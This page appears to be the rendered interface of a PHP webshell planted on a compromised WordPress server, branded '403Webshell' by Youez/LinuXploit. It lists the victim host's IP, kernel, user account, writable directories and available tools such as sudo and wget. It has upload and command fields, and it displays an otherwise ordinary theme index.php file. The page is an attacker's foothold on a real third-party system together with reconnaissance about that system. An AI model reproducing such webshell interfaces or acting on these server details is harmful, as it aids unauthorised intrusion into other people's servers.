403Webshell
Server IP : 208.109.34.209  /  Your IP : 216.73.217.134
Web Server : Apache
System : Linux 209.34.109.208.host.secureserver.net 5.14.0-687.29.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 23 16:18:48 EDT 2026 x86_64
User : oceanproject ( 1012)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/oceanproject/public_html/wp-content/themes/reda/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/oceanproject/public_html/wp-content/themes/reda//index.php
<?php

$class = '';
$sidebarActive = false;
if((is_active_sidebar('sidebar-1') && function_exists('get_field') && get_field('reda_archive_sidebar', 'option') == true) || (is_active_sidebar('sidebar-1') && !function_exists('get_field'))) {
	$sidebarActive = true;
}

if($sidebarActive) {
	$class = 'medium-centered large-uncentered';
} else {
	$class = 'small-centered';
}

get_header(); ?>

<div class="blog blog-classic page-padding-top">
	<div class="row">
		<div class="small-12 medium-10 large-8 <?php echo esc_attr($class); ?> columns blog-content">
			<?php if ( have_posts() ) : ?>
			<div class="blog-content-classic">
				<?php while ( have_posts() ) : the_post();
					get_template_part( 'template-parts/post/content', get_post_format() );
					endwhile; ?>
			</div>
			<?php the_posts_pagination(array(
    			'prev_text' => '<div class="previous-page arrow-prev"><i class="fa fa-angle-left"></i></div>',
    			'next_text' => '<div class="next-page arrow-next"><i class="fa fa-angle-right"></i></div>',
			)); ?>			

			<?php else :

			endif; ?>
		</div>
		<?php if($sidebarActive) : ?>
		<div class="small-12 medium-10 medium-offset-1 large-offset-0 large-4 end columns">
			<?php get_sidebar(); ?>
		</div>
		<?php endif; ?>
	</div>
</div>

<?php get_footer(); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit